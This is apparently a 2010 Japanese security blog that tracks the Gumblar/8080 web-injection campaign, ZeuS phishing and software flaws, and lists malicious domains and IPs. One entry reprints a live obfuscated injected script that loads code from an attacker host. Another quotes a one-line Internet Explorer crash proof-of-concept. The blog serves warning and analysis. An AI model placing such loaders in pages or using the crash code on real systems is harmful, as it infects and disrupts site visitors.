例えば umcTmk7ZhoX2sk6 のようなパスワードを、複数、暗記して置ける人がいるでしょうか?暗記できない場合、どこに保管するのですか? ポストイットで貼るのですか? 特にFTPの場合、相手からパスワードが発行され、自分では変更できないケースが多々あり、往々にして10桁以上のランダム文字列のことが多いのではないでしょうか?
FUDを煽るつもりはありませんが、初期のGumblar(Martuz)には、キーロガーの存在が確認されていた時期(亜種)も存在します。

なぜFFFTPをやめなればならないの?
FFFTPはFTPのみのプロトコルにしか対応しておらず、当方としては FTPS(21+PASV)の使用を推奨している以上、平文FTPにしか対応していないFFFTPは根本的にNGだと考えています。また、独自パスワードをソースから解析したマルウェア作者ですので、感染すれば当然 iniファイルも窃取されるものと考えなければなりません。現実問題として、FileZillaのconfig fileは既に窃取対象となっていることは実証されています。

----------
セキュリーナ
税金の無駄
という意見には概ね同意しますが、経済産業省そのものが悪いのかどうかは、私は態度保留にしておきます。

【パート①】小中学生のためのインターネット安全教室
【パート②】小中学生のためのインターネット安全教室

こういった擬人化キャラクターや、ビデオ広報によって、セキュリティの啓蒙を図ることそのものには、私は別に否定はしません。むしろ、もっとおおっぴらにやって欲しいと思います。問題は、そのベクトルがあまりにも斜め上に向かっている点ではないでしょうか?

小中学生相手の啓蒙活動なら、例えばTBSのこういう取り組みと全く連携が取れていません。

去年の4月のzlkon.lvから始まった、一連の攻撃がなぜここまで拡大しているのか?、どうしてパンデミックが払拭できないのか? そういった点を、日本でだれか真剣に考えたことがあるのでしょうか?

少なくとも、CCCにここまで書いてるのですから、それをきちんと CHECK PC 側にも、IPAの警報にもフィードバックしてください。税金を使って、日本でも有数のセキュリティ研究家の人が「監修」してるんですから、もう少しちゃんとして欲しいというのが本音です。

今のままだと、so-netセキュリティ通信 に完全に負けてます・・・
※so-netは、変なメールじゃなくて、ISPの一つであって、セキュ会社ではありませんので念のため。

----------
Adobe
わぁい、日本語だぁ(棒読み)
Adobe ReaderおよびAcrobat用セキュリティアップデート公開
Adobe Illustrator CS3およびCS4用セキュリティアップデート公開

個人的感想は控えさせていただきます(笑)

----------
攻防戦展開中

iPad買って
ダメ!

旗色悪し orz...

----------
                     
明日は早朝出向なので、ひょっとしたら書けないかもしれません。

ごめんなさいっ2行ほど消し(笑)
Thanks > Iさん
EoF

22 Comments »

2010.01.28 木曜日

Posted in apologize on 1 月 28th, 2010 by gnome

宇宙からの警告の日
1986年のスペースシャトル・チャレンジャー号爆発事故(51L)に因む。
逸話の日
[い(1)つ(2)わ(8)]
コピーライターの日
1956年の万国著作権条約で©マークが制定されたことに因み、コピーライト(copyright)をコピーライター(copywriter)にかけたもの。
不動
毎月28日は不動明王の縁日で、一年で最初の縁日が「初不動」。
荒神

----------
久しぶりにウィルスっぽいものを見た
知能テストに見せかけHDDのデータを破壊、危険なワームが拡大
これを実行すると、Windowsシステムの重要部分にワームのコピーが複数作成されるが、厄介なのは、感染してすぐには動作を開始しないため、ユーザーがその時点で感染に気付くのがほとんど不可能な点。しかし感染から20~40日がたった時点で不審なエラーメッセージが表示され、その次に再起動すると、 PC起動時にまず読み込まれるHDDの先頭部分、マスターブートレコード(MBR)の最初の50Kバイトを上書きして破壊してしまう。

どんな知能テストなんだろうと思って探してみましたが・・
Virus Writers Produce Hardware Damaging Code with Win32.Worm.Zimuse
Malware Alert - Win32.Worm.Zimuse.A - The Hard-Disk Wrecker
チェコ語なんてわかりません orz ...

The Hell Angels or, better said, the Malware Angels…
W32/Mseus.Aっと・・これでしょうか?
MD5:0x63A6A43F94C06334E3B9249D374B8114

Computers Worldwide Targetted by a MBR Worm
Esetは Zimuse Removal Tool を用意しています。

VTが見当たりませんでしたが、そこそこ検出してるのではないでしょうか?
MBRを書き潰すというのはよくある手法ですが、最近はデータ窃取系ばっかりだったのでちょっと新鮮な気がするのはきっとキノセイでしょう。

----------
ネーミング・・
Aurora(MS10-002)の穴はもう塞ぎましたか?
MS10-002 Exploit Constructor
あ・・暗黒工作組・・・・

天井から金タライが降ってきそうなネーミングセンスですが、こういうのが出回るようになるとあちこちにブービートラップが仕掛けられるようになる可能性があります。
IE 0day CVE-2010-0249 – Blocking and Tracking
.ms8.cc
.babooa562.com
.fenghuashi.com
.xfbfgw.com
.21npc.com
.9istyle.com NEW
.qvodcom1.com NEW
.d5d3.com NEW
.c5c3.com NEW
.tsqzsb.cn
.21sys21.cn
.23sys23.cn
.fsus.cn
.latax.gov.cn NEW
.nba1001.net
.ynew.net
キリがない気がするのは、いつものことですね・・・・

----------
Facebookの匿名化?
unNamed App
Phantom app risk used to bait scareware trap

そんなものは無い!ということで。

----------
e107
e107 CMS system website compromised
CMSの配布サイトが陥落して、マルウェアへの誘導が行われる・・
なんだかもう、「いつもの光景」になってしまった今日この頃が怖くありませんか?

Possible backdoor in the e107 CMS
そもそもシステム内にもバックドアがあり、それを突かれてホームページが陥落ということ?
失墜した信用を快復するのは大変でしょうが、がんばってください。

e107 Unspecified Vulnerability 4
Update to version 0.7.17 or later.
NOTE: The full install .zip file hosted on the vendor site contained a backdoor. Ensure to install or re-install a clean package from sourceforge.
最新にアップデートしないといけないけど、最新版にバックドアが含まれていた、ということでしょうか? 公式版からではなく SourceForgeからダウンロードするように・・といわれても・・

「ソフトウェアは公式からダウンロードしましょう!」という根底が崩れ去りました。

----------
バレンタインシーズン到来
A Brilliant Proposal: Stay Away from Valentine’s Day Spam!
はいはい・・

去年のは卑怯だったなぁ・・

----------
今日もZeuS
Zeus/zbot - aba.com
aba.com -「American Banker Association」を騙る版です。
ネタはつきませんね。
ほんとに・・
American Bankers Association version of Zeus Bot / Zbot
transactionreport.exe 6/40 (15.00%)

----------
穴ぼこっ

yaSSL Certificate Processing Buffer Overflow Vulnerability 4
Update to version 1.9.9.

Sun Java System Web Proxy Server Multiple Vulnerabilities 4
Restrict network access to the affected services.
A final solution is pending completion.

----------
その他

Hackers Exploit Actor Johnny Depp’s Death Hoax
そのうち、デマを自分で撒き始めそうな気が・・・

Nmap 5.21 released
It is a bug-fix only release instead

Jan 26 dns-bh update
107 new domains to add to your dns sinkhole or malware shunlist:

最近急に Firefox 3.6 が落ちるようになった場合の対処法(YSlow 利用者向け)
もしかして YSlow 2.0.5 を使ってません?
2.0.6 に更新しましょう(2.0.6 のリリースノートには「Firefox 3.6 起動時のクラッシュを修正」とだけ...)
使ってないけど堕ちるのはどうしたらいいんでしょう(泣)
※タブ200枚いっき!いっき!とかするからだ!と言われた・・・

Inside the PlayStation 3 Exploit
ナナメ読みだけではよくわかりませんが Glitch attacks revealed という、Glitch=裏技 のような用法でしょうか?

セキュリティ文化を醸成するための具体策 (1/2)
そのまえに教育を・・・

中小組織の情報セキュリティ相談に対応、「情報セキュリティ相談センター」が設立
情報セキュリティ専任者を設置するのが難しい中小企業などを支援する一般社団法人「情報セキュリティ相談センター」がこのほど設立され、相談対応や専門事業者を紹介するサービスを2月2日に始めると発表した。
期待しておきましょうか
Q:ガンブラーにヤラれちゃったんですけど
A:キャッシュを消してください
のような対応にならなければいいんですけどね

----------
$499だとっ~ぉぉぉ!
ううっ・・・お金ないのに・・・
Apple、タブレット「iPad」を発表 499ドルから
ストレージ容量 Wi-Fi Wi-Fi+3G
16Gバイト 499ドル 629ドル
32Gバイト 599ドル 729ドル
64Gバイト 699ドル 829ドル

TechCrunch:
名前はiPadだった ―Appleのタブレット、ついにベールを脱ぐ
[CG]電子ブックストアも発表
[CG]iPadの詳しい情報がアップルサイトに
iPadのデモビデオ
AppleがiPadを発表―目玉はiBooks、価格は$500から$830

engadget:
アップル iPad 実機ギャラリー&インプレッション
速報:アップル "latest creation"イベント
アップル、iBooksで電子ブック市場に参入
アップル iPad はiPhoneアプリがそのまま動作、対応SDKは本日公開
アップル、タブレット端末iPadを発表。499ドルから(仕様詳細&ギャラリー追加)

印象として、「でかいiPhone」なんですが、インパクトはありますね。

あと、当然ながら・・
Apple Tablet Announcement Black SEO -- Date:01.27.2010
やっぱりそう来たか・・・

----------
Gumblar.8080
ラウンドロビンの系列が2つに分離(以前にもそういうことがありました)
yourtruemate.ru.
82.192.88.35 AS16265(LEASEWEB)
91.121.1.99 AS16276(OVH Paris)
91.121.4.99 AS16276(OVH Paris)
91.121.7.26 AS16276(OVH Paris)
217.23.5.27 AS49981(WORLDSTREAM)

genuinecolors.ru.
80.69.74.73 AS20857(TRANSIP)
91.121.4.99 AS16276(OVH Paris) ***
91.121.86.130 AS16276(OVH Paris)
94.23.4.164 AS16276(OVH Paris)
217.23.5.27 AS49981(WORLDSTREAM) ***

IPは変更なし *** 印は重複
ひょっとしたら他にも分岐しているのかもしれません。

----------
Google Safe Browsing
| 1264604410 | B | [goog-black-hash 1.49731 update]
| 1264604402 | M | [goog-malware-hash 1.18935 update]
| 297049 | -722(297771) 微減
| 1283571 |
EoF

Leave A Comment »

[WARNING] 8080 が攻撃手順を変更か?

Posted in Announce, RiskHedge, security on 1 月 27th, 2010 by gnome

注意喚起
約7時間ほど前に、8080系の使用していた ru ドメインのうちの殆どが A レコードを失い、正引き不能になりました。
それと同時に、いくつかのインジェクションが変更された模様です。

こうしたインジェクション攻撃は、定期的にパターンを変更する傾向がありますので注意してください。
※8080系は Symantecの主張するガンブラー™と名づけられた攻撃手法の一つです。

ampsguide.ru
anycitytown.ru
authentictype.ru
burkewebservices.ru
carswebnet.ru
easylifedirect.ru
freeprosports.ru
funwebmail.ru
guidebat.ru
genuinehollywood.ru
genuinecolors.ru
halfsite.ru
homeproair.ru
homesaleplus.ru
lagworld.ru
saletradeonline.ru
suesite.ru
sugaryhome.ru
superaguide.ru
superpropicks.ru
theatticsale.ru
theaworld.ru
thechocolateweb.ru
thelaceweb.ru
themobilewindow.ru
themobisite.ru
viewhomesale.ru
webdesktopnet.ru
webdirectbroker.ru
webnetenglish.ru
webnetloans.ru
webnetenglish.ru
whosaleonline.ru
worldsouth.ru
worldwebworld.ru
yourtruemate.ru
い色のドメインが残留、更にドメイン変更の可能性大。

----------
/* */ 消去?
From Hidden Iframes to Obfuscated Scripts -- comment
The script has a new revision already out and being injected into sites. A sample:

<script> try{window.onload=function(){document.write('<div id=megaid>skysports-com.marketwatch</div>');Whglbtpkg9yawk = document.getElementById('megaid').innerHTML + '.)c^o#$$#m@(@.&&(!t&o(&&r##&&r!($#e#@!n@t!s!)-@(r(u@$^.$$&y)!!o&!u#!!r##!t!&@!o@($&p!@(&f$@i^l$m)^!@s(.())r!#(&u!)@:&!&#)D)E)&#&B)()U^&(@G&@(@/#(^c((a!m)##)$4#@@.#&^c####&o(#!m)/@^c$&a^)@m(4&#.!@)(^c($o@m!&!/(g)!!o&&#$o!g&(l&)^^e&#@.&^c#(o^&m!^$/(#m!^^c(&s$s@)l!^$.^&$c(($o#(@m)(/@!&g@#o&!!$@o$##g$@#l$e&&).#$c^#o$#!m#&)$.)(#e&&)^g)&/&'.replace(/&|#|\$|\)|\!|\(|\^|@/ig, '') ;document.write('<scr'+'ipt src=http://'+Whglbtpkg9yawk.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} } catch(Xvp1q8pu ) {}</script>
<!--50e1dd63239a5e1b3900972f2e5de214-->

という感じで攻撃手法の変更が報告されています。

2010.02.02
一部アンチウィルスソフトにひっかかると(携帯に)連絡があったので、半角括弧を全角に変更しました。

あぁ・・いたちごっこ

----------
あ~あ~
サーバーアプリの脆弱性突かれ、共有サーバー丸ごと改ざん
スタンダード10で提供しておりますfig(フォトアルバム)のセキュリティホールを利用し、不正なプログラムを設置、実行されたことが原因であると思われます。問題が発生した当該プログラムは削除済みです。

2010.01.06 水曜日
これかな(笑)
修正済みかと思ったけど、そうでもなかったらしいですね

----------
その他

iSlateなのか iPadなのか ・・・
明日がたのしみ・・・

6万5千円のディナーショー(CTスキャンつき?)お疲れ様でした(笑)

sophosのvirus info は詳細が無いので役に立たないと思うんですけど・・・

EoF(追記中)

Leave A Comment »

2010.01.27 水曜日

Posted in security on 1 月 27th, 2010 by gnome

国旗制定記念日

1870年の旧暦1月27日(新暦2月27日)に郵船商船規則(太政官布告第57号)が定められ、日本の国旗(日章旗)のデザインの原型が決まった
ハワイ移民出発の日
ハワイにおける日本人移民 小林克也&ザ・ナンバーワン・バンド
ホロコースト犠牲者を想起する国際デー (International Holocaust Remembrance Day)
アウシュヴィッツ=ビルケナウ強制収容所の解放に因む

----------

寒いけど雪をまだ見ていない~

----------
A River Runs Through It
そんなイイモノじゃないですか?(苦笑)
年明け国内フィッシング事情(1)~カード情報狙うYahoo!フィッシング再始動
年明け国内フィッシング事情(2)~ゲームアカウント狙うフィッシング2題
年明け国内フィッシング事情(3)~Zeus/Zbot系ボットネットも大暴れ
この辺は、以前からの手口と同じだが、最近のZeus/Zbot系ボットネットの偽サイトには、ページを開いただけで自動実行してしまう仕掛けが組み込まれている。世間を騒がせている、いわゆるガンブラー(Gumblar、8080)の攻撃サイトと同種の脆弱性攻撃も仕掛けてくるのだ。
これもSymantecに言わせれば「ガンブラー™」ってことになります(笑)
まだ完全には実証されていませんが、Outlook系の脆弱性を突いた攻撃もあるようですので、最重要警戒対象です。MS10-002の適用を全PCに徹底させ、できる限り IE6/Outlook(Express含む)の使用を避け、最新のソリューションに移行してください。

ホストする国内のユーザーのパソコンは、年末に比べると減ってはいるものの、時間帯によって1~2台が参加している状態だ
年末の頃は、so-netさんの感染ノードもちらほらありましたが(笑)テイクダウンありがとうございます。UCOMとの統合でまた増えるかもしれませんが、引き続きテイクダウン手法の強化と関連機関の連携をお願いしたいです。
facebook.comの偽サイト -- January 26, 2010
116.81.44・86 == nttkyo985086・tkyo.nt.ftth.ppp.infoweb.ne.jp via InfoWeb(AS2510) NiftyServe
みたいな感じであまり美しくないですからね~

ZeuS/zbot - Facebook and Visa の継続
Drive by Download(aka ガンブラー™©Symantec)にZeuS系が参戦したことで、FastFlux+DbD攻撃の夢のコラボレーションが実現・・・しなくていいっての!
IPでもドメインでも塞ぎようがないので、これに未確認のゼロデイなんか混ぜられるともうオテアゲですよ・・・・

Facebook/AOL Update Tool Spam Campaign Serving Crimeware and Client-Side Exploits -- Dancho Danchev
こっちはPushdoなの? もう何がなんだかワケワカメですね・・・

何を塞いだら良いのか誰か教えて~~
(WANケーブルをひっこぬけ!)

----------
Chrome4.0
Google Releases Chrome 4.0.249.78
いきなりUScert情報かよ!って怒られそうですが(笑)
Stable Channel Update
Google Chrome Multiple Vulnerabilities 4
グーグル、Windows版Chromeの最新バージョンをリリース
新バージョンでは、13個の脆弱性が修正されており、そのうち6つは同社の脅威度評価システムで「高」にランキングされていた。
誤解しないようにしなければならないのは、ゼロデイが発生する前に塞がれている「脆弱性」は逆に評価されるべきです。逆に、MicrosoftやAdobeやAppleあたりの、ゼロデイが発生して、攻撃が[IN THE WILD]になってから修正される状況は最悪です。特にAdobeの場合、修正された後にもかかわらず、アップデートのためのソリューションが確立していないため、ゼロデイでは無いにも拘わらず、長期間にわたって脆弱性悪用されるケースが一番危険です。

その点、Chromeは問答無用で勝手にバージョンアップしますので、安全といえば安全なのですが、セキュリティ担当としてはポリシー的にマズい点も発生するかもしれません。

セキュリティ・ポリシーの根本的な見直しが図られる時期なのかもしれません。

参考:
Webブラウザのセキュリティ問題を考える上での鉄則

----------
またscrか!
scr: Windowsスクリーンセーバー用の実行ファイル(PE)
Don't update via email!
update2010.scr 7/40 (17.50%)
メールには気をつけましょうっていうのは、小学校くらいから教えないといけないのかもしれない・・・

現実:個人ブログ:キーワード「ルフトハンザ」あたりで検索:
メールの文章及び、ゲームの説明文は英語表記だけだとか、
「セキュリティが安全でないサイトです」とか警告されるのは何とかならないか
と思いつつ・・・・
早速プレイ!ぽちっとな☆
*sigh* 嘆息

----------
あ~あ
TechCrunch、一時乗っ取られる
TechCrunched – TechCrunch the Victim of a Defacement

TechCrunchもRackspace(AS27357 VA)の中に収容されてるのか・・
とりあえず WordPressのフラッグシップの一つですので、早急にバージョンアップしたほうがいいのでは(笑)

----------
Spam Assassin
Apache Software Foundation releases SpamAssassin 3.3.0
Apache Software Foundation releases SpamAssassin 3.3.0

こないだ、2010年のspam加算問題を起こした Apacheの spam assassin ですが、May of 2007以来の本格的なバージョンアップを行いました。

適用中のところは、順次アップデートしたほうがよさそうです(うちはズルいので人柱を待ってからにしょう・笑)
ANNOUNCE: Apache SpamAssassin 3.3.0 available


----------
osCommerce flawed part:2
Bety.php Hack. Part 2. Black Hats in Action.
osCommerceサイトの汚染レポート part.2

参考:
Bety.php – osCommerce Hack. Part 1.
2010.01.19 火曜日

----------
Akismet powered by Panda
Blog Comment Spam Honeypot
超絶にウザイ、blogへのspam/trackback攻撃ですが、Panda Labsが「ブログコメント・ハニーポット」を立ち上げ、WordPressのspamフィルタで有名なakismet用モジュールを提供しました。
The honeypot basically posts everything that Akismet detects as spam into an XML which is then processed and all links are followed to detect malware, exploits, drive-by downloads, etc.
If you have a wordpress blog and would like to install the honeypot to send your trapped spam to PandaLabs for analysis, simply download and install the blog comment spam honeypot..
興味のある方(spamに悩まされている方)は試してみるのも一考です(ただし自己責任で)
※ウチはアップデートも、プラグインも入れさせてくれません

----------
その他
:
Internet Explorer 6/7 - Local crash
verified: yes
<script>document.createElement("html").outerHTML</script>
また何か・・

:
ランサムウェアとスケアウェアの“極悪”コラボが流行の兆し
そんなもん前からだったような・・
Scareware becomes ransomware again

:
Where in the World Is DOWNAD/Conficker?
ほんと・・どこにいるんでしょうね?

:
How Trojan.Hydraq Stays On Your Computer
だから Auroraと呼べ!(笑)
また繰り返す気なのかな(conficker/downadup/kidoあたり)

:
VMware vSphere Hardening Guide Draft posted for public review
Announcing vSphere 4.0 Hardening Guide Public Draft Release
VMwareはhardeningしてもしてもしてもしても、セキュパッチで設定がふっとんで、以下略という悪循環がたまに・・・
※SANSのポスト番号が 8080 でした(笑)

:
bozohttpd "parse_request()" Vulnerability 4
unpatched : last update 2009/04/18

:
年末年始のP2P
そういえば、その後あまり話をききませんね・・・と思ったら
Shareで入手したアニメを無断上映 ネットカフェを家宅捜索
喉もと過ぎれば、こうなっちゃってます?

----------
雑談

:
ウィルコム、会社更生法を適用へ
コラージュに笑った
孫社長が次世代 W-ZERO3を掲げ「これが本当のインターネットマシン (略)」と満面の笑みを浮かべる日が来るのか否かに注目です。
あるあ・・・

:
WIDEプロジェクトのIRCサーバー運用終了のお知らせ
WIDEプロジェクトIRCワーキンググループによるIRCサーバ運用終了について
本当にこれまでお世話になりました。特に irc.fujisawa.wide.ad.jp (笑)
いろいろな変な人工無能(bot)プログラムを大量に放り込んでごめんなさい!
ありがとう Farewell!
でも、北大(irc.huie.hokudai.ac.jp)と京大(irc.media.kyoto-u.ac.jp)は残るっぽいですね

----------
Gumblar.8080
91.121.74.84 AS16276(OVH Paris)
91.121.93.220 AS16276(OVH Paris) NEW
91.121.142.111 AS16276(OVH Paris)
91.186.31.4 AS29550(EUROCONNEX) as 91.186.0.0/19 Blueconnex Network :: 91.186.0.
217.23.5.27 AS49981(WORLDSTREAM)

LeaseWebが消え(テイクダウンされたかどうかは知らない)、OVHの新IPと、EUROCONNEX(Blueconnex)が参戦。
まだまだ手持ちの弾薬が多いなぁ・・

----------
Google Safe Browsing
| 1264536014 | B | [goog-black-hash 1.49674 update]
| 1264536002 | M | [goog-malware-hash 1.18922 update]
| 297771 | +29(297742) 微微増
| 1281789 |
EoF

Leave A Comment »

2010.01.26 火曜日

Posted in security on 1 月 26th, 2010 by gnome

文化財防火デー
1949年に法隆寺金堂の壁画が焼損したことを教訓に、文化財を火災や震災から守り、文化財愛護思想の普及高揚を図る目的で制定。
有料駐車場の日
東京都が1959 年に公共駐車場として日本初のパーキングメーターを日比谷と丸の内に設置した
1948年、帝国銀行椎名町支店で東京都衛生員を名乗る男が行員12名を毒殺、現金・小切手18万1千円を強奪(帝銀事件
2000年、W3Cが、HTML 4.01をXMLに基いて再定義した「XHTML1.0」を勧告。

----------

時間がな~い

----------
Target:PS3
Once impenetrable PS3 cracked wide open
this time penetrating the previously impervious PlayStation 3 gaming console.
ほ~?
The hack will allow PS3 users for the first time to run unrestricted versions of Linux that have full access to the system's central processing unit and graphical processing unit. That will greatly expand the kinds of things users can do with the console. For starters, they could use the mod to run emulators that will play PS2 games on the machine, something Sony strictly forbids.
またか・・・
マイクロソフト、違法に改造された360本体をXbox LIVEから一斉に追放
こうなるまえにちょっと考えましょうね~

※しかし、米空軍に納入されたPS3は大丈夫なんでしょうね?(笑)

----------
Eleonore Exploit kit
A Peek Inside the ‘Eleonore’ Browser Exploit Kit
最近流行り?の Eleonore Exploit Tool-kit の解体作業。
ナナメ読みしかしてません(宿題)

Javaのリンクが CVE-2010とかなってたので一瞬アセリましたが、たぶん CVE-2008-5353 のことでしょう。
CVE-2008-5353はFirefox上でもExploit成功率が高い厄介なシロモノです。

----------
botnetの「民主化」?
はぃ?
Botnets: "The Democratization of Espionage"
なんか近寄りたくない世界の話をやってますね・・

botnetはカネ目当ての犯罪組織のやってる下品な行為です!
ときちんと言って貰わないと困ります(苦笑)

こういう攻撃に正当性を与える言質にもなりかねません
Oil companies hit by 'state' cyber attacks, says report

----------
Twitter learned something
Flash widget disabled
TwitterのFlashウィジェット、脆弱性情報を受け提供中止
マイクロブログサービスのTwitterは1月22日のステータス報告で、同社のFlashウィジェットに脆弱性があるとの情報が寄せられたため、警戒的措置として利用できないようにしたと発表した。
GJ!
(かな?)

----------
ああ・時間切れ

実は記事(というのもアレですが)書いてる最中に2回フリーズ(原因はビデオドライバの不調 RADEOooooN!)でどーにもならなく・・・

SSL for free
まだ試してないので、メモ書き
※StartSSLは、IEの認証が通るようになりました。

仮想化の“神”による四次元攻撃の危険性、ラック西本氏が指摘
また変な言葉がデテキタヨ・・・
えと、本当にもうどうしてもFTPの使用中止ができない場合には、最低でもFTPの接続先を制限しましょう。
Gumblar[ガンブラー](複数の亜種を含む)ウイルスの感染拡大と対策のお願い
.ftpaccessで FTP 接続元を制御する
Deny from all
Allow from 127.0.0.1 (違うだろ!)
それでも、ネットワーク内のパケットを盗聴されたら終わりですが。
※逆に言えば FTPS/SCPクライアントから直接Credential(ID/Password/接続先情報)を盗まれれば、どんな対策しても同じですが・・・

StopBadware will operate as non-profit
まだ読んでませんが、StopBadware が別組織になるとか・・
今後に期待・・というか動向を注視しておきましょう。

Extensions, bookmark sync and more for Google Chrome
Chrome 4.0 ベータの話

Troj/JSRedir-AK: 40% of a month’s malware
見よ!世の中にはガンブラー™だらけではないか!?
ていうか~区切りかたが雑すぎるのでは?(笑)
Troj/JSRedir-AK will redirect the web browser to other malicious websites.

Alarm in show_ads.js
ごめんなさい、てへっ
これ・・クラウドで相互信頼してるセキュアプリだと、こういう誤検知が別ベンダーに飛び火するんでしょうか?

WinAMP系 x 2
Winamp v5.572 whatsnew.txt Stack Overflow Exploit
Winamp v5.572 whatsnew.txt Local Buffer Overflow Exploit WinXP SP3 De
Latest ver: Winamp v5.572

----------
Gumblar.8080
82.192.88.35 AS16265(LEASEWEB)
91.121.86.130 AS16276(OVH Paris)
91.121.88.218 AS16276(OVH Paris)
94.23.11.38 AS16276(OVH Paris)
217.23.5.27 AS49981(WORLDSTREAM)

LeaseWeb(1) WorldStream(1)はIP変わらず、OVH Parisは前にも使われていたものと差し替え
どうしたっ! LeaseWeb!?

----------
Google Safe Browsing
| 1264449614 | B | [goog-black-hash 1.49602 update]
| 1264449602 | M | [goog-malware-hash 1.18898 update]
| 297742 | +2958(294784) 反転増加
| 1278969 |
EoF

Leave A Comment »

« Previous Entries
ホットワード padding margin FFFTP 作者 攻撃
割引クーポンまとめ情報 - クー割